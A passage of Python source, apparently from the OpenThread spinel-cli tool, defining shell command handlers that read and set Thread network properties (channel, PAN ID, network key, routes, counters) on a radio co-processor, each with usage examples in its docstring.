def prop_insert_value(self, prop_id, value, py_format='B'):
""" Blocking helper to insert entry for given list property. """
return self.wpan_api.prop_insert_value(prop_id, value, py_format)
def prop_remove_value(self, prop_id, value, py_format='B'):
""" Blocking helper to remove entry for given list property. """
return self.wpan_api.prop_remove_value(prop_id, value, py_format)
def prop_get_or_set_value(self, prop_id, line, mixed_format='B'):
""" Helper to get or set a property value based on line arguments. """
if line:
value = self.prep_line(line, mixed_format)
py_format = self.prep_format(value, mixed_format)
value = self.prop_set_value(prop_id, value, py_format)
else:
value = self.prop_get_value(prop_id)
return value
@classmethod
def prep_line(cls, line, mixed_format='B'):
""" Convert a command line argument to proper binary encoding (pre-pack). """
value = line
if line != None:
if mixed_format == 'U': # For UTF8, just a pass through line unmodified
line += '\0'
value = line.encode('utf-8')
elif mixed_format in (
'D',
'E'): # Expect raw data to be hex string w/o delimeters
value = util.hex_to_bytes(line)
elif isinstance(line, str):
# Most everything else is some type of integer
value = int(line, 0)
return value
@classmethod
def prep_format(cls, value, mixed_format='B'):
""" Convert a spinel format to a python pack format. """
py_format = mixed_format
if value == "":
py_format = '0s'
elif mixed_format in ('D', 'U', 'E'):
py_format = str(len(value)) + 's'
return py_format
def prop_get(self, prop_id, mixed_format='B'):
""" Helper to get a propery and output the value with Done or Error. """
value = self.prop_get_value(prop_id)
if value is None:
print("Error")
return None
if (mixed_format == 'D') or (mixed_format == 'E'):
print(util.hexify_str(value, ''))
else:
print(str(value))
print("Done")
return value
def prop_set(self, prop_id, line, mixed_format='B', output=True):
""" Helper to set a propery and output Done or Error. """
value = self.prep_line(line, mixed_format)
py_format = self.prep_format(value, mixed_format)
result = self.prop_set_value(prop_id, value, py_format)
if not output:
return result
if result is None:
print("Error")
else:
print("Done")
return result
def handle_property(self, line, prop_id, mixed_format='B', output=True):
""" Helper to set property when line argument passed, get otherwise. """
value = self.prop_get_or_set_value(prop_id, line, mixed_format)
if not output:
return value
if value is None or value == "":
print("Error")
return None
if line is None or line == "":
# Only print value on PROP_VALUE_GET
if mixed_format == '6':
print(str(ipaddress.IPv6Address(value)))
elif (mixed_format == 'D') or (mixed_format == 'E'):
print(binascii.hexlify(value).decode('utf8'))
elif mixed_format == 'H':
if prop_id == SPINEL.PROP_MAC_15_4_PANID:
print("0x%04x" % value)
else:
print("%04x" % value)
else:
print(str(value))
print("Done")
return value
def do_help(self, line):
if line:
cmd, _arg, _unused = self.parseline(line)
try:
doc = getattr(self, 'do_' + cmd).__doc__
except AttributeError:
doc = None
if doc:
self.log("%s\n" % textwrap.dedent(doc))
else:
self.log("No help on %s\n" % (line))
else:
self.print_topics(
"\nAvailable commands (type help <name> for more information):",
SpinelCliCmd.command_names, 15, 80)
def do_v(self, _line):
"""
version
Shows detailed version information on spinel-cli tool:
"""
self.log(NETWORK_PROMPT + " ver. " + __version__)
self.log(__copyright__)
@classmethod
def do_clear(cls, _line):
""" Clean up the display. """
os.system('reset')
def do_history(self, _line):
"""
history
Show previously executed commands.
"""
try:
import readline
hist = readline.get_current_history_length()
for idx in range(1, hist + 1):
self.log(readline.get_history_item(idx))
except ImportError:
pass
def do_h(self, line):
""" Shortcut for history. """
self.do_history(line)
def do_exit(self, _line):
""" Exit the shell. """
self.log("exit")
return True
def do_quit(self, line):
""" Exit the shell. """
return self.do_exit(line)
def do_q(self, line):
""" Exit the shell. """
return self.do_exit(line)
def do_EOF(self, _line):
""" End of file handler for when commands are piped into shell. """
self.log("\n")
return True
def emptyline(self):
pass
def default(self, line):
if line[0] == "#":
CONFIG.LOGGER.debug(line)
else:
CONFIG.LOGGER.info(line + ": command not found")
# exec(line)
def do_debug(self, line):
"""
Enables detail logging of bytes over the wire to the radio modem.
Usage: debug <1=enable | 0=disable>
"""
if line != None and line != "":
level = int(line)
else:
level = 0
CONFIG.debug_set_level(level)
def do_debugmem(self, _line):
""" Profile python memory usage. """
from guppy import hpy
heap_stats = hpy()
print(heap_stats.heap())
print()
print(heap_stats.heap().byrcs)
def do_bufferinfo(self, line):
"""
\033[1mbufferinfo\033[0m
Get the mesh forwarder buffer info.
\033[2m
> bufferinfo
total: 128
free: 128
6lo send: 0 0
6lo reas: 0 0
ip6: 0 0
mpl: 0 0
mle: 0 0
arp: 0 0
coap: 0 0
Done
\033[0m
"""
result = self.prop_get_value(SPINEL.PROP_MSG_BUFFER_COUNTERS)
if result != None:
print("total: %d" % result[0])
print("free: %d" % result[1])
print("6lo send: %d %d" % result[2:4])
print("6lo reas: %d %d" % result[4:6])
print("ip6: %d %d" % result[6:8])
print("mpl: %d %d" % result[8:10])
print("mle: %d %d" % result[10:12])
print("arp: %d %d" % result[12:14])
print("coap: %d %d" % result[14:16])
print("Done")
else:
print("Error")
def do_channel(self, line):
"""
\033[1mchannel\033[0m
Get the IEEE 802.15.4 Channel value.
\033[2m
> channel
11
Done
\033[0m
\033[1mchannel <channel>\033[0m
Set the IEEE 802.15.4 Channel value.
\033[2m
> channel 11
Done
\033[0m
"""
self.handle_property(line, SPINEL.PROP_PHY_CHAN)
def do_child(self, line):
"""\033[1m
child list
\033[0m
List attached Child IDs
\033[2m
> child list
1 2 3 6 7 8
Done
\033[0m\033[1m
child <id>
\033[0m
Print diagnostic information for an attached Thread Child.
The id may be a Child ID or an RLOC16.
\033[2m
> child 1
Child ID: 1
Rloc: 9c01
Ext Addr: e2b3540590b0fd87
Mode: rsn
Net Data: 184
Timeout: 100
Age: 0
LQI: 3
RSSI: -20
Done
\033[0m
"""
child_table = self.prop_get_value(SPINEL.PROP_THREAD_CHILD_TABLE)[0]
if line == 'list':
result = ''
for child_data in child_table:
child_data = child_data[0]
child_id = child_data[1] & 0x1FF
result += '{} '.format(child_id)
print(result)
print("Done")
else:
try:
child_id = int(line)
printed = False
for child_data in child_table:
child_data = child_data[0]
id = child_data[1] & 0x1FF
if id == child_id:
mode = ''
if child_data[7] & 0x08:
mode += 'r'
if child_data[7] & 0x04:
mode += 's'
if child_data[7] & 0x02:
mode += 'd'
if child_data[7] & 0x01:
mode += 'n'
print("Child ID: {}".format(id))
print("Rloc: {:04x}".format(child_data[1]))
print("Ext Addr: {}".format(
binascii.hexlify(child_data[0])))
print("Mode: {}".format(mode))
print("Net Data: {}".format(child_data[4]))
print("Timeout: {}".format(child_data[2]))
print("Age: {}".format(child_data[3]))
print("LQI: {}".format(child_data[5]))
print("RSSI: {}".format(child_data[6]))
print("Done")
printed = True
if not printed:
print("Error")
except ValueError:
print("Error")
def do_childmax(self, line):
"""\033[1m
childmax
\033[0m
Get the Thread Child Count Max value.
\033[2m
> childmax
10
Done
\033[0m\033[1m
childmax <timeout>
\033[0m
Set the Thread Child Count Max value.
\033[2m
> childmax 5
Done
\033[0m
"""
self.handle_property(line, SPINEL.PROP_THREAD_CHILD_COUNT_MAX)
def do_childtimeout(self, line):
"""\033[1m
childtimeout
\033[0m
Get the Thread Child Timeout value.
\033[2m
> childtimeout
300
Done
\033[0m\033[1m
childtimeout <timeout>
\033[0m
Set the Thread Child Timeout value.
\033[2m
> childtimeout 300
Done
\033[0m
"""
self.handle_property(line, SPINEL.PROP_THREAD_CHILD_TIMEOUT, 'L')
def do_commissioner(self, line):
"""
These commands are enabled when configuring with --enable-commissioner.
\033[1m
commissioner start
\033[0m
Start the Commissioner role on this node.
\033[2m
> commissioner start
Done
\033[0m\033[1m
commissioner stop
\033[0m
Stop the Commissioner role on this node.
\033[2m
> commissioner stop
Done
\033[0m\033[1m
commissioner panid <panid> <mask> <destination>
\033[0m
Perform panid query.
\033[2m
> commissioner panid 57005 4294967295 ff33:0040:fdde:ad00:beef:0:0:1
Conflict: dead, 00000800
Done
\033[0m\033[1m
commissioner energy <mask> <count> <period> <scanDuration>
\033[0m
Perform energy scan.
\033[2m
> commissioner energy 327680 2 32 1000 fdde:ad00:beef:0:0:ff:fe00:c00
Energy: 00050000 0 0 0 0
Done
\033[0m
"""
pass
def do_contextreusedelay(self, line):
"""
contextreusedelay
Get the CONTEXT_ID_REUSE_DELAY value.
> contextreusedelay
11
Done
contextreusedelay <delay>
Set the CONTEXT_ID_REUSE_DELAY value.
> contextreusedelay 11
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_CONTEXT_REUSE_DELAY, 'L')
def do_counters(self, line):
"""
counters
Get the supported counter names.
> counters
mac
mle
Done
counters <countername>
Get the counter value.
> counters mac
TxTotal: 10
TxUnicast: 3
TxBroadcast: 7
TxAckRequested: 3
TxAcked: 3
TxNoAckRequested: 7
TxData: 10
TxDataPoll: 0
TxBeacon: 0
TxBeaconRequest: 0
TxOther: 0
TxRetry: 0
TxDirectRetrySuccess: [ 0:2, 1:2, 2:1 ]
TxDirectMaxRetryExpiry: 1
TxIndirectRetrySuccess: [ 0:0 ]
TxIndirectMaxRetryExpiry: 1
TxErrCca: 0
TxAbort: 0
TxErrBusyChannel: 0
RxTotal: 2
RxUnicast: 1
RxBroadcast: 1
RxData: 2
RxDataPoll: 0
RxBeacon: 0
RxBeaconRequest: 0
RxOther: 0
RxAddressFiltered: 0
RxDestAddrFiltered: 0
RxDuplicated: 0
RxErrNoFrame: 0
RxErrNoUnknownNeighbor: 0
RxErrInvalidSrcAddr: 0
RxErrSec: 0
RxErrFcs: 0
RxErrOther: 0
Done
> counters mle
Role Disabled: 0
Role Detached: 1
Role Child: 0
Role Router: 0
Role Leader: 1
Attach Attempts: 1
Partition Id Changes: 1
Better Partition Attach Attempts: 0
Parent Changes: 0
Done
counters <countername> reset
Reset the counter value.
> counters mac reset
Done
> counters mle reset
Done
"""
params = line.split(" ")
if params[0] == "mac":
if len(params) == 1:
histogram = None
result = self.prop_get_value(SPINEL.PROP_CNTR_ALL_MAC_COUNTERS)
caps_list = self.prop_get_value(SPINEL.PROP_CAPS)
for caps in caps_list[0]:
if SPINEL.CAP_MAC_RETRY_HISTOGRAM == caps[0][0]:
histogram = self.prop_get_value(
SPINEL.PROP_CNTR_MAC_RETRY_HISTOGRAM)
if result != None:
counters_tx = result[0][0]
counters_rx = result[1][0]
print("TxTotal: %d" % counters_tx[0])
print(" TxUnicast: %d" % counters_tx[1])
print(" TxBroadcast: %d" % counters_tx[2])
print(" TxAckRequested: %d" % counters_tx[3])
print(" TxAcked: %d" % counters_tx[4])
print(" TxNoAckRequested: %d" % counters_tx[5])
print(" TxData: %d" % counters_tx[6])
print(" TxDataPoll: %d" % counters_tx[7])
print(" TxBeacon: %d" % counters_tx[8])
print(" TxBeaconRequest: %d" % counters_tx[9])
print(" TxOther: %d" % counters_tx[10])
print(" TxRetry: %d" % counters_tx[11])
if histogram != None:
histogram_direct = histogram[0][0]
if len(histogram_direct) != 0:
print(" TxDirectRetrySuccess: [", end='')
for retry in range(len(histogram_direct)):
print(" %d:%s" %
(retry, histogram_direct[retry][0]),
end=',' if retry !=
(len(histogram_direct) - 1) else " ]\n")
print(" TxDirectMaxRetryExpiry: %s" %
(counters_tx[15][0]))
if histogram != None:
histogram_indirect = histogram[1][0]
if len(histogram_indirect) != 0:
print(" TxIndirectRetrySuccess: [", end='')
for retry in range(len(histogram_indirect)):
print(" %d:%s" %
(retry, histogram_indirect[retry][0]),
end=',' if retry !=
(len(histogram_indirect) - 1) else " ]\n")
print(" TxIndirectMaxRetryExpiry: %s" %
(counters_tx[16][0]))
print(" TxErrCca: %d" % counters_tx[12])
print(" TxAbort: %d" % counters_tx[13])
print(" TxErrBusyChannel: %d" % counters_tx[14])
print("RxTotal: %d" % counters_rx[0])
print(" RxUnicast: %d" % counters_rx[1])
print(" RxBroadcast: %d" % counters_rx[2])
print(" RxData: %d" % counters_rx[3])
print(" RxDataPoll: %d" % counters_rx[4])
print(" RxBeacon: %d" % counters_rx[5])
print(" RxBeaconRequest: %d" % counters_rx[6])
print(" RxOther: %d" % counters_rx[7])
print(" RxAddressFiltered: %d" % counters_rx[8])
print(" RxDestAddrFiltered: %d" % counters_rx[9])
print(" RxDuplicated: %d" % counters_rx[10])
print(" RxErrNoFrame: %d" % counters_rx[11])
print(" RxErrNoUnknownNeighbor: %d" % counters_rx[12])
print(" RxErrInvalidSrcAddr: %d" % counters_rx[13])
print(" RxErrSec: %d" % counters_rx[14])
print(" RxErrFcs: %d" % counters_rx[15])
print(" RxErrOther: %d" % counters_rx[16])
print("Done")
else:
print("Error")
elif len(params) == 2:
if params[1] == "reset":
self.prop_set_value(SPINEL.PROP_CNTR_ALL_MAC_COUNTERS, 1)
self.prop_set_value(SPINEL.PROP_CNTR_MAC_RETRY_HISTOGRAM, 1)
print("Done")
else:
print("Error")
elif params[0] == "mle":
if len(params) == 1:
result = self.prop_get_value(SPINEL.PROP_CNTR_MLE_COUNTERS)
if result != None:
print("Role Disabled: %d" % result[0])
print("Role Detached: %d" % result[1])
print("Role Child: %d" % result[2])
print("Role Router: %d" % result[3])
print("Role Leader: %d" % result[4])
print("Attach Attempts: %d" % result[5])
print("Partition Id Changes: %d" % result[6])
print("Better Partition Attach Attempts: %d" % result[7])
print("Parent Changes: %d" % result[8])
print("Done")
else:
print("Error")
elif len(params) == 2:
if params[1] == "reset":
self.prop_set_value(SPINEL.PROP_CNTR_MLE_COUNTERS, 1)
print("Done")
else:
print("Error")
elif params[0] is None or params[0] == "":
print("mac")
print("mle")
print("Done")
else:
print("Error")
def do_discover(self, line):
"""
discover [channel]
Perform an MLE Discovery operation.
channel: The channel to discover on. If no channel is provided,
the discovery will cover all valid channels.
> discover
| J | Network Name | Extended PAN | PAN | MAC Address | Ch | dBm | LQI |
+---+------------------+------------------+------+------------------+----+-----+-----+
| 0 | OpenThread | dead00beef00cafe | ffff | f1d92a82c8d8fe43 | 11 | -20 | 0 |
Done
"""
pass
def do_eidcache(self, line):
"""
eidcache
Print the EID-to-RLOC cache entries.
> eidcache
fdde:ad00:beef:0:bb1:ebd6:ad10:f33 ac00
fdde:ad00:beef:0:110a:e041:8399:17cd 6000
Done
"""
pass
def do_extaddr(self, line):
"""
extaddr
Get the IEEE 802.15.4 Extended Address.
> extaddr
dead00beef00cafe
Done
extaddr <extaddr>
Set the IEEE 802.15.4 Extended Address.
> extaddr dead00beef00cafe
dead00beef00cafe
Done
"""
self.handle_property(line, SPINEL.PROP_MAC_15_4_LADDR, 'E')
def do_extpanid(self, line):
"""
extpanid
Get the Thread Extended PAN ID value.
> extpanid
dead00beef00cafe
Done
extpanid <extpanid>
Set the Thread Extended PAN ID value.
> extpanid dead00beef00cafe
Done
"""
self.handle_property(line, SPINEL.PROP_NET_XPANID, 'D')
def do_joiner(self, line):
"""
These commands are enabled when configuring with --enable-joiner.
joiner start <pskd> <provisioningUrl>
Start the Joiner role.
* pskd: Pre-Shared Key for the Joiner.
* provisioningUrl: Provisioning URL for the Joiner (optional).
This command will cause the device to perform an MLE Discovery and
initiate the Thread Commissioning process.
> joiner start PSK
Done
joiner stop
Stop the Joiner role.
> joiner stop
Done
"""
PSKd = ""
params = line.split(" ")
if len(params) > 0:
sub_command = params[0]
if len(params) > 1:
PSKd = params[1]
PSKd = self.prep_line(PSKd, 'U')
if sub_command == "":
pass
elif sub_command == "start":
py_format = self.prep_format(PSKd, 'U')
self.prop_set_value(SPINEL.PROP_MESHCOP_JOINER_CREDENTIAL, PSKd,
py_format)
self.prop_set_value(SPINEL.PROP_MESHCOP_JOINER_ENABLE, 1)
print("Done")
return
elif sub_command == "stop":
self.prop_set_value(SPINEL.PROP_MESHCOP_JOINER_ENABLE, 0)
print("Done")
return
print("Error")
def complete_ifconfig(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for ifconfig command. """
map_sub_commands = ('up', 'down')
return [i for i in map_sub_commands if i.startswith(text)]
def do_ifconfig(self, line):
"""
ifconfig up
Bring up the IPv6 interface.
> ifconfig up
Done
ifconfig down
Bring down the IPv6 interface.
> ifconfig down
Done
ifconfig
Show the status of the IPv6 interface.
> ifconfig
down
Done
"""
params = line.split(" ")
if params[0] == "":
value = self.prop_get_value(SPINEL.PROP_NET_IF_UP)
if value != None:
map_arg_value = {
0: "down",
1: "up",
}
print(map_arg_value[value])
elif params[0] == "up":
self.prop_set(SPINEL.PROP_NET_IF_UP, '1')
return
elif params[0] == "down":
self.prop_set(SPINEL.PROP_NET_IF_UP, '0')
return
print("Done")
def complete_ipaddr(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for ipaddr command. """
map_sub_commands = ('add', 'remove')
return [i for i in map_sub_commands if i.startswith(text)]
def do_ipaddr(self, line):
"""
ipaddr
List all IPv6 addresses assigned to the Thread interface.
> ipaddr
fdde:ad00:beef:0:0:ff:fe00:0
fe80:0:0:0:0:ff:fe00:0
fdde:ad00:beef:0:558:f56b:d688:799
fe80:0:0:0:f3d9:2a82:c8d8:fe43
Done
ipaddr add <ipaddr>
Add an IPv6 address to the Thread interface.
> ipaddr add 2001::dead:beef:cafe
Done
ipaddr del <ipaddr>
Delete an IPv6 address from the Thread interface.
> ipaddr del 2001::dead:beef:cafe
Done
"""
params = line.split(" ")
valid = 1
preferred = 1
flags = 0
# always use /64, as prefix.network.prefixlen returns /128.
prefix_len = 64
num = len(params)
if num > 1:
ipaddr = params[1]
prefix = ipaddress.IPv6Interface(str(ipaddr))
arr = prefix.ip.packed
if params[0] == "":
addrs = self.wpan_api.get_ipaddrs()
for addr in addrs:
print(str(addr))
elif params[0] == "add":
arr += self.wpan_api.encode_fields('CLLC', prefix_len, valid,
preferred, flags)
self.prop_insert_value(SPINEL.PROP_IPV6_ADDRESS_TABLE, arr,
str(len(arr)) + 's')
if self.tun_if:
self.tun_if.addr_add(ipaddr)
elif params[0] == "remove":
arr += self.wpan_api.encode_fields('CLLC', prefix_len, valid,
preferred, flags)
self.prop_remove_value(SPINEL.PROP_IPV6_ADDRESS_TABLE, arr,
str(len(arr)) + 's')
if self.tun_if:
self.tun_if.addr_del(ipaddr)
print("Done")
def do_keysequence(self, line):
"""
keysequence counter
Get the Thread Key Sequence Counter.
> keysequence counter
10
Done
keysequence counter <counter>
Set the Thread Key Sequence Counter.
> keysequence counter 10
Done
keysequence guardtime
Get the thrKeySwitchGuardTime (in hours).
> keysequence guardtime
0
Done
keysequence guardtime <guardtime>
Set the thrKeySwitchGuardTime (in hours).
> keysequence guardtime 0
Done
"""
args = line.split(" ")
if args[0] == "counter":
newline = line.replace("counter", "")
self.handle_property(newline, SPINEL.PROP_NET_KEY_SEQUENCE_COUNTER,
'L')
elif args[0] == "guardtime":
newline = line.replace("guardtime", "")
self.handle_property(newline, SPINEL.PROP_NET_KEY_SWITCH_GUARDTIME,
'L')
def do_leaderdata(self, line):
"""
leaderdata
Get the Thread network Leader Data.
> leaderdata
Partition ID: 1987912443
Weighting: 64
Data Version: 4
Stable Data Version: 129
Leader Router ID: 47
Done
"""
partition_id = self.prop_get_value(SPINEL.PROP_NET_PARTITION_ID)
weighting = self.prop_get_value(SPINEL.PROP_THREAD_LEADER_WEIGHT)
data_version = self.prop_get_value(
SPINEL.PROP_THREAD_NETWORK_DATA_VERSION)
stable_version = self.prop_get_value(
SPINEL.PROP_THREAD_STABLE_NETWORK_DATA_VERSION)
leader_id = self.prop_get_value(SPINEL.PROP_THREAD_LEADER_RID)
if partition_id is None or \
weighting is None or \
data_version is None or \
stable_version is None or \
leader_id is None:
print("Error")
else:
print("Partition ID: %d" % partition_id)
print("Weighting: %d" % weighting)
print("Data Version: %d" % data_version)
print("Stable Data Version: %d" % stable_version)
print("Leader Router ID: %d" % leader_id)
print("Done")
def do_leaderweight(self, line):
"""
leaderweight
Get the Thread Leader Weight.
> leaderweight
128
Done
leaderweight <weight>
Set the Thread Leader Weight.
> leaderweight 128
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_LOCAL_LEADER_WEIGHT)
def do_mfg(self, line):
"""
mfg <diagnostic command>
Check all the factory diagnostic commands here:
https://github.com/openthread/openthread/blob/main/src/core/diags/README.md
For example:
Start the diagnostic module.
> mfg start
start diagnostics mode
status 0x00
Retrieved radio statistics.
> mfg stats
received packets: 0
sent packets: 0
first received packet: rssi=0, lqi=0
last received packet: rssi=0, lqi=0
"""
result = self.prop_set(SPINEL.PROP_NEST_STREAM_MFG, line, 'U', False)
if result != None:
print(result.rstrip())
else:
print("Error")
def do_mode(self, line):
"""
mode
Get the Thread Device Mode value.
r: rx-on-when-idle
d: Full Function Device
n: Full Network Data
> mode
rdn
Done
mode [rdn]
Set the Thread Device Mode value.
r: rx-on-when-idle
d: Full Function Device
n: Full Network Data
> mode rsdn
Done
"""
map_arg_value = {
0x00: "-",
0x01: "n",
0x02: "d",
0x03: "dn",
0x08: "r",
0x09: "rn",
0x0A: "rd",
0x0B: "rdn",
}
map_arg_name = {
"-": "0",
"n": 0x01,
"d": 0x02,
"dn": 0x03,
"r": 0x08,
"rn": 0x09,
"rd": 0x0A,
"rdn": 0x0B,
}
if line:
try:
# remap string state names to integer
line = map_arg_name[line]
except KeyError:
print("Error")
return
result = self.prop_get_or_set_value(SPINEL.PROP_THREAD_MODE, line)
if result != None:
if not line:
print(map_arg_value[result])
print("Done")
else:
print("Error")
def do_netdata(self, line):
"""
netdata
Register local network data with Thread Leader.
> netdata register
Done
"""
params = line.split(" ")
if params[0] == "register":
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.handle_property("0",
SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE)
def do_networkidtimeout(self, line):
"""
networkidtimeout
Get the NETWORK_ID_TIMEOUT parameter used in the Router role.
> networkidtimeout
120
Done
networkidtimeout <timeout>
Set the NETWORK_ID_TIMEOUT parameter used in the Router role.
> networkidtimeout 120
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_NETWORK_ID_TIMEOUT)
def do_networkkey(self, line):
"""
networkkey
Get the Thread Network Key value.
> networkkey
00112233445566778899aabbccddeeff
Done
networkkey <key>
Set the Thread Network Key value.
> networkkey 00112233445566778899aabbccddeeff
Done
"""
self.handle_property(line, SPINEL.PROP_NET_NETWORK_KEY, 'D')
def do_networkname(self, line):
"""
networkname
Get the Thread Network Name.
> networkname
OpenThread
Done
networkname <name>
Set the Thread Network Name.
> networkname OpenThread
Done
"""
self.handle_property(line, SPINEL.PROP_NET_NETWORK_NAME, 'U')
def do_panid(self, line):
"""
panid
Get the IEEE 802.15.4 PAN ID value.
> panid
0xdead
Done
panid <panid>
Set the IEEE 802.15.4 PAN ID value.
> panid 0xdead
Done
"""
self.handle_property(line, SPINEL.PROP_MAC_15_4_PANID, 'H')
def do_parent(self, line):
"""
parent
Get the addresses of the parent node.
> parent
Ext Addr: 3ad35f9846ceb9c7
Rloc: bc00
Done
"""
ext_addr, rloc = self.prop_get_value(SPINEL.PROP_THREAD_PARENT)
if ext_addr is None or\
rloc is None:
print("Error")
else:
print("Ext Addr: {}".format(binascii.hexlify(ext_addr)))
print("Rloc: {:04x}".format(rloc))
def do_ping(self, line):
"""
ping <ipaddr> [size] [count] [interval]
Send an ICMPv6 Echo Request.
> ping fdde:ad00:beef:0:558:f56b:d688:799
16 bytes from fdde:ad00:beef:0:558:f56b:d688:799: icmp_seq=1 hlim=64 time=28ms
"""
params = line.split(" ")
addr = "::1"
_size = "56"
_count = "1"
_interval = "1"
if len(params) > 0:
addr = params[0]
if len(params) > 1:
_size = params[1]
if len(params) > 2:
_count = params[2]
if len(params) > 3:
_interval = params[3]
try:
# Generate local ping packet and send directly via spinel.
ml64 = self.prop_get_value(SPINEL.PROP_IPV6_ML_ADDR)
ml64 = str(ipaddress.IPv6Address(ml64))
timenow = int(round(time.time() * 1000)) & 0xFFFFFFFF
data = bytearray(int(_size))
ping_req = self.icmp_factory.build_icmp_echo_request(
ml64,
addr,
data,
identifier=(timenow >> 16),
sequence_number=(timenow & 0xffff))
self.wpan_api.ip_send(ping_req)
# Let handler print result
except:
print("Fail")
print(traceback.format_exc())
def complete_prefix(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for prefix command. """
map_sub_commands = ('add', 'remove')
return [i for i in map_sub_commands if i.startswith(text)]
def do_prefix(self, line):
"""
prefix add <prefix> [pvdcsr] [prf]
Add a valid prefix to the Network Data.
p: Preferred flag
a: Stateless IPv6 Address Autoconfiguration flag
d: DHCPv6 IPv6 Address Configuration flag
c: DHCPv6 Other Configuration flag
r: Default Route flag
o: On Mesh flag
s: Stable flag
prf: Default router preference, which may be 'high', 'med', or 'low'.
> prefix add 2001:dead:beef:cafe::/64 paros med
Done
prefix remove <prefix>
Invalidate a prefix in the Network Data.
> prefix remove 2001:dead:beef:cafe::/64
Done
"""
params = line.split(" ")
stable = 0
flags = 0
arr = ""
num = len(params)
if num > 1:
prefix = ipaddress.IPv6Interface(str(params[1]))
arr = prefix.ip.packed
if num > 2:
map_param_to_flag = {
'p': kThread.PrefixPreferredFlag,
'a': kThread.PrefixSlaacFlag,
'd': kThread.PrefixDhcpFlag,
'c': kThread.PrefixConfigureFlag,
'r': kThread.PrefixDefaultRouteFlag,
'o': kThread.PrefixOnMeshFlag,
}
for char in params[2]:
if char == 's':
stable = 1 # Stable flag
else:
flag = map_param_to_flag.get(char, None)
if flag is not None:
flags |= flag
if num > 3:
map_arg_name = {
"high": 2,
"med": 1,
"low": 0,
}
prf = map_arg_name[params[3]]
flags |= (prf << kThread.PrefixPreferenceOffset)
if params[0] == "":
self.prop_get_value(SPINEL.PROP_THREAD_ON_MESH_NETS)
elif params[0] == "add":
arr += self.wpan_api.encode_fields('CbC', prefix.network.prefixlen,
stable, flags)
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_insert_value(SPINEL.PROP_THREAD_ON_MESH_NETS, arr,
str(len(arr)) + 's')
elif params[0] == "remove":
arr += self.wpan_api.encode_fields('CbC', prefix.network.prefixlen,
stable, flags)
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_remove_value(SPINEL.PROP_THREAD_ON_MESH_NETS, arr,
str(len(arr)) + 's')
print("Done")
def do_releaserouterid(self, line):
"""
releaserouterid <routerid>
Release a Router ID that has been allocated by the device in the Leader role.
> releaserouterid 16
Done
"""
if line:
value = int(line)
self.prop_remove_value(SPINEL.PROP_THREAD_ACTIVE_ROUTER_IDS, value)
print("Done")
def do_rloc16(self, line):
"""
rloc16
Get the Thread RLOC16 value.
> rloc16
0xdead
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_RLOC16, 'H')
def do_reset(self, line):
"""
reset
Reset the NCP.
> reset
"""
self.wpan_api.cmd_reset()
self.prop_set_value(SPINEL.PROP_IPv6_ICMP_PING_OFFLOAD, 1)
self.prop_set_value(SPINEL.PROP_THREAD_RLOC16_DEBUG_PASSTHRU, 1)
def complete_route(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for route command. """
map_sub_commands = ('add', 'remove')
return [i for i in map_sub_commands if i.startswith(text)]
def do_route(self, line):
"""
route add <prefix> [s] [prf]
Add a valid prefix to the Network Data.
s: Stable flag
prf: Default Router Preference, which may be: 'high', 'med', or 'low'.
> route add 2001:dead:beef:cafe::/64 s med
Done
route remove <prefix>
Invalidate a prefix in the Network Data.
> route remove 2001:dead:beef:cafe::/64
Done
"""
params = line.split(" ")
stable = 0
prf = 0
num = len(params)
if num > 1:
prefix = ipaddress.IPv6Interface(str(params[1]))
arr = prefix.ip.packed
if params[0] == "":
self.prop_get_value(SPINEL.PROP_THREAD_LOCAL_ROUTES)
elif params[0] == "add":
arr += self.wpan_api.encode_fields('CbC', prefix.network.prefixlen,
stable, prf)
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_insert_value(SPINEL.PROP_THREAD_LOCAL_ROUTES, arr,
str(len(arr)) + 's')
elif params[0] == "remove":
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_remove_value(SPINEL.PROP_THREAD_LOCAL_ROUTES, arr,
str(len(arr)) + 's')
print("Done")
def do_router(self, line):
"""
router list
List allocated Router IDs
> router list
8 24 50
Done
router <id>
Print diagnostic information for a Thread Router.
The id may be a Router ID or an RLOC16.
> router 50
Alloc: 1
Router ID: 50
Rloc: c800
Next Hop: c800
Link: 1
Ext Addr: e2b3540590b0fd87
Cost: 0
LQI In: 3
LQI Out: 3
Age: 3
Done
> router 0xc800
Alloc: 1
Router ID: 50
Rloc: c800
Next Hop: c800
Link: 1
Ext Addr: e2b3540590b0fd87
Cost: 0
LQI In: 3
LQI Out: 3
Age: 7
Done
"""
pass
def do_routerselectionjitter(self, line):
"""
routerselectionjitter
Get the ROUTER_SELECTION_JITTER value.
> routerselectionjitter
120
Done
routerselectionjitter <threshold>
Set the ROUTER_SELECTION_JITTER value.
> routerselectionjitter 120
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_ROUTER_SELECTION_JITTER)
def do_routerupgradethreshold(self, line):
"""
routerupgradethreshold
Get the ROUTER_UPGRADE_THRESHOLD value.
> routerupgradethreshold
16
Done
routerupgradethreshold <threshold>
Set the ROUTER_UPGRADE_THRESHOLD value.
> routerupgradethreshold 16
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_ROUTER_UPGRADE_THRESHOLD)
def do_routerdowngradethreshold(self, line):
"""
routerdowngradethreshold
Get the ROUTER_DOWNGRADE_THRESHOLD value.
> routerdowngradethreshold
16
Done
routerdowngradethreshold <threshold>
Set the ROUTER_DOWNGRADE_THRESHOLD value.
> routerdowngradethreshold 16
Done
"""
self.handle_property(line,
SPINEL.PROP_THREAD_ROUTER_DOWNGRADE_THRESHOLD)
def do_scan(self, _line):
"""
scan [channel]
Perform an IEEE 802.15.4 Active Scan.
channel: The channel to scan on. If no channel is provided,
the active scan will cover all valid channels.
